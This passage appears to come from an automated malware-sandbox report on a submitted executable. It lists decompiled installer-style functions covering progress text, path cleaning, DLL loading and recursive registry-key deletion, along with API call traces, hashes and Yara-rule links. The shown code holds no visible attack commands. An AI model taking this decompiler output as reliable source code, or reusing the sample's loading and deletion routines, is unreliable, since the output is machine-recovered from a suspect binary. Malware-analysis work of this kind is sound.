						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x42e7e8, 0x429c60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x429c60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429c60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429c60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                      0x00404d6f
                                                                      0x00404d7b
                                                                      0x00404d7e
                                                                      0x00404d84
                                                                      0x00404d90
                                                                      0x00404d93
                                                                      0x00404d96
                                                                      0x00404d9c
                                                                      0x00404d9c
                                                                      0x00404da2
                                                                      0x00404daa
                                                                      0x00404dad
                                                                      0x00404dca
                                                                      0x00404dce
                                                                      0x00404dd7
                                                                      0x00404dd7
                                                                      0x00404de1
                                                                      0x00404dea
                                                                      0x00404df6
                                                                      0x00404dfd
                                                                      0x00404e01
                                                                      0x00404e04
                                                                      0x00404e17
                                                                      0x00404e25
                                                                      0x00404e25
                                                                      0x00404e29
                                                                      0x00404e2b
                                                                      0x00404e2e
                                                                      0x00000000
                                                                      0x00404e2e
                                                                      0x00404daf
                                                                      0x00404db7
                                                                      0x00404dbf
                                                                      0x00404dc5
                                                                      0x00000000
                                                                      0x00404dc5
                                                                      0x00404dbf
                                                                      0x00404dad
                                                                      0x00404e38

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                      • lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                      • lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                      • SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: affc104c252ae17fd0e997cd29e1146603040f74c7626340a325fc6ea0e747b1
                                                                      • Instruction ID: 92468eaa65ab5e9d2da8b894f350d876ca08d4ce6a9febd395d245304a04307e
                                                                      • Opcode Fuzzy Hash: affc104c252ae17fd0e997cd29e1146603040f74c7626340a325fc6ea0e747b1
                                                                      • Instruction Fuzzy Hash: B72160B1901118BADF119FA5CD859DEBFB9EF44354F04807AF544B6290C7794E40CBA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405BD3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405BD3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405509(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054C8("*?|<>/\":", _t5))) == 0) {
							E00405641(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                      0x00405bd5
                                                                      0x00405bdd
                                                                      0x00405bf1
                                                                      0x00405bf1
                                                                      0x00405bf7
                                                                      0x00405c04
                                                                      0x00405c04
                                                                      0x00405c05
                                                                      0x00405c07
                                                                      0x00405c0b
                                                                      0x00405c0d
                                                                      0x00405c16
                                                                      0x00405c18
                                                                      0x00405c32
                                                                      0x00405c3a
                                                                      0x00405c3a
                                                                      0x00405c3f
                                                                      0x00405c41
                                                                      0x00405c43
                                                                      0x00405c47
                                                                      0x00405c48
                                                                      0x00405c4b
                                                                      0x00405c53
                                                                      0x00405c55
                                                                      0x00405c59
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c5f
                                                                      0x00405c64
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c64
                                                                      0x00405c69

                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C2B
                                                                      • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C38
                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C3D
                                                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C4D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-2982765560
                                                                      • Opcode ID: 9e58ff8809a7c7a12694b45d6a4332c54744f2b66e8e9de4fda5420d35e2781e
                                                                      • Instruction ID: e583e1b1d98595a14f3c28bd186b9eb51b7c0ef9f5ba4087d3cb4cd7b15a2251
                                                                      • Opcode Fuzzy Hash: 9e58ff8809a7c7a12694b45d6a4332c54744f2b66e8e9de4fda5420d35e2781e
                                                                      • Instruction Fuzzy Hash: 8E11B251808B9529FB3216280D44BBB7F98CF57760F18047BE5C5722C2D67CAC829F6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404638, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404638(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                      0x00404646
                                                                      0x00404653
                                                                      0x00404659
                                                                      0x00404697
                                                                      0x00404697
                                                                      0x004046a6
                                                                      0x004046ad
                                                                      0x00000000
                                                                      0x004046af
                                                                      0x0040465b
                                                                      0x0040466a
                                                                      0x00404672
                                                                      0x00404675
                                                                      0x00404687
                                                                      0x0040468d
                                                                      0x00404694
                                                                      0x00000000
                                                                      0x00404694
                                                                      0x00000000

                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404653
                                                                      • GetMessagePos.USER32 ref: 0040465B
                                                                      • ScreenToClient.USER32 ref: 00404675
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404687
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 8939a733ac818a857620fb03d083872b00868bc922679df8549fd600b0bd897d
                                                                      • Instruction ID: 4d8a51df142dfa575a30cd399ea29616324454f4b00b7c41faff93775b70e16f
                                                                      • Opcode Fuzzy Hash: 8939a733ac818a857620fb03d083872b00868bc922679df8549fd600b0bd897d
                                                                      • Instruction Fuzzy Hash: 90015271D00218BADB00DB94DC85BFFBBFCAB55711F10416BBB00B62D0D7B869458BA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401FD6, Relevance: 9.1, APIs: 6, Instructions: 74libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E00401FD6(int __ebx) {
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001);
				if( *0x42f0d0 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9D(0xfffffff0);
					 *(_t37 + 8) = E00402A9D(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t33 = LoadLibraryExA(_t35, _t28, 8);
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t33 = GetModuleHandleA(_t35);
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D69(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x430000, 0x40afe8, 0x409000);
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x42f0a8 =  *0x42f0a8 +  *(_t37 - 4);
				return 0;
			}








                                                                      0x00401fd6
                                                                      0x00401fde
                                                                      0x00401fe1
                                                                      0x00401fed
                                                                      0x00402090
                                                                      0x00000000
                                                                      0x00401ff3
                                                                      0x00401ffb
                                                                      0x00402005
                                                                      0x00402008
                                                                      0x00402017
                                                                      0x00402021
                                                                      0x00402025
                                                                      0x0040208c
                                                                      0x00402092
                                                                      0x00402092
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040200a
                                                                      0x00402011
                                                                      0x00402015
                                                                      0x00402027
                                                                      0x00402031
                                                                      0x00402035
                                                                      0x00402079
                                                                      0x00402037
                                                                      0x0040203a
                                                                      0x0040203d
                                                                      0x0040206d
                                                                      0x0040203f
                                                                      0x00402042
                                                                      0x0040204b
                                                                      0x0040204d
                                                                      0x0040204d
                                                                      0x0040204b
                                                                      0x0040203d
                                                                      0x00402081
                                                                      0x00402084
                                                                      0x00402084
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402015
                                                                      0x00402008
                                                                      0x00402098
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00008001), ref: 00401FE1
                                                                      • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040200B
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040201B
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040202B
                                                                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402084
                                                                      • SetErrorMode.KERNEL32 ref: 00402098
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 1609199483-0
                                                                      • Opcode ID: e1aae45f44c4ebed3ed36172859ca6a2ad49075dd00bb9d840c681027f18f838
                                                                      • Instruction ID: 57f493d9fc40383ab318066455ce7b931c156c6844e967600fdf6a810a89660c
                                                                      • Opcode Fuzzy Hash: e1aae45f44c4ebed3ed36172859ca6a2ad49075dd00bb9d840c681027f18f838
                                                                      • Instruction Fuzzy Hash: 4821C971D04325EBCB306FA5CF4996E7AB0AB44355F20417BF711B62E0C7B84941DA5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402BAE, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402BAE(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b028 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x414c30; // 0xcbdc3
					_t7 =  *0x428c38; // 0xcbdc7
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x414bf0,  *0x40b028, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x414bf0);
					SetDlgItemTextA(_t16, 0x406, 0x414bf0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                                                      0x00402bba
                                                                      0x00402bc2
                                                                      0x00402bce
                                                                      0x00402bd7
                                                                      0x00402bda
                                                                      0x00402bda
                                                                      0x00402be2
                                                                      0x00402be4
                                                                      0x00402bea
                                                                      0x00402bf1
                                                                      0x00402bf3
                                                                      0x00402bf3
                                                                      0x00402c0c
                                                                      0x00402c17
                                                                      0x00402c24
                                                                      0x00402c2c
                                                                      0x00402c2c
                                                                      0x00402c37

                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCE
                                                                      • MulDiv.KERNEL32(000CBDC3,00000064,000CBDC7), ref: 00402BF9
                                                                      • wsprintfA.USER32 ref: 00402C0C
                                                                      • SetWindowTextA.USER32(?,00414BF0), ref: 00402C17
                                                                      • SetDlgItemTextA.USER32 ref: 00402C24
                                                                      • ShowWindow.USER32(?,00000005,?,00000406,00414BF0), ref: 00402C2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: TextWindow$ItemShowTimerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 559026099-0
                                                                      • Opcode ID: 91ef1b36f5720515517a90dcf963e1e16e0f439d891600b78cf102efee8e2b64
                                                                      • Instruction ID: 7d05f416cde50b6084005c706393f5427f21405d9f934a2ccac42c904c2f386d
                                                                      • Opcode Fuzzy Hash: 91ef1b36f5720515517a90dcf963e1e16e0f439d891600b78cf102efee8e2b64
                                                                      • Instruction Fuzzy Hash: 6D018871A44214BBD7209F15AD49FFF3768EB45721F008039FA09B62D0DB78A8519FAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402ADD, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402ADD(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADD(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                                                      0x00402af8
                                                                      0x00402b00
                                                                      0x00402b28
                                                                      0x00402b12
                                                                      0x00402b59
                                                                      0x00000000
                                                                      0x00402b61
                                                                      0x00402b26
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402b26
                                                                      0x00402b3d
                                                                      0x00000000
                                                                      0x00402b49
                                                                      0x00402b53

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF8
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B34
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B3D
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B49
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B59
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                                      • Instruction ID: 43845d972939b32c8459b9529feec676c881337d2958cd618b714e39fea56b76
                                                                      • Opcode Fuzzy Hash: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                                      • Instruction Fuzzy Hash: 36016932900108FBDB21AF90DE88DAF7B3DEB44384F104172BA01A10A0D7B0AE55AA65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401D2C, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00401D2C() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9D(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                      0x00401d38
                                                                      0x00401d3f
                                                                      0x00401d6e
                                                                      0x00401d76
                                                                      0x00401d7d
                                                                      0x00401d7d
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00401D32
                                                                      • GetClientRect.USER32 ref: 00401D3F
                                                                      • LoadImageA.USER32 ref: 00401D60
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D6E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: b02376979bedd074853e5fbf5c326cf524b223cbbd13035aea6afd2f9c465352
                                                                      • Instruction ID: ae89fa22d0436c8bef1e03633192d5cad9c1ad8ea06547c970e0648154d4d9e2
                                                                      • Opcode Fuzzy Hash: b02376979bedd074853e5fbf5c326cf524b223cbbd13035aea6afd2f9c465352
                                                                      • Instruction Fuzzy Hash: FCF0ECB2A04119BFDB01DBA4EE88DAF77BCEB14301B000475F601F61A1C6789D428B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404556, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 35%
                                                                      			E00404556(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059C6(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059C6(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059C6(_t34, 0, 0x42a488, 0x42a488, _a8);
				wsprintfA(_t26 + lstrlenA(0x42a488), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e7f8, _a4, 0x42a488);
			}













                                                                      0x0040455e
                                                                      0x00404562
                                                                      0x0040456a
                                                                      0x0040456d
                                                                      0x0040456e
                                                                      0x00404570
                                                                      0x00404572
                                                                      0x00404575
                                                                      0x00404575
                                                                      0x0040457c
                                                                      0x00404582
                                                                      0x00404582
                                                                      0x00404589
                                                                      0x00404594
                                                                      0x00404595
                                                                      0x00404598
                                                                      0x00404598
                                                                      0x004045a5
                                                                      0x004045b0
                                                                      0x004045b3
                                                                      0x004045c5
                                                                      0x004045cc
                                                                      0x004045cd
                                                                      0x004045dc
                                                                      0x004045ec
                                                                      0x00404608

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404476,000000DF,?,00000000,00000400), ref: 004045E4
                                                                      • wsprintfA.USER32 ref: 004045EC
                                                                      • SetDlgItemTextA.USER32 ref: 004045FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: 64a4aac5eaa70763bdacf4e8d4062d8ddb7d8a1686be96c013f54f202a635439
                                                                      • Instruction ID: cfae16ef9c8bc24b09f19e15c1b273aab45c223eefe3bce1affb9d6119793989
                                                                      • Opcode Fuzzy Hash: 64a4aac5eaa70763bdacf4e8d4062d8ddb7d8a1686be96c013f54f202a635439
                                                                      • Instruction Fuzzy Hash: 9F1108B3A0012477DB10666D9C45EEF375DCBC53B4F14023BFA25F61D1E9788C1186A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

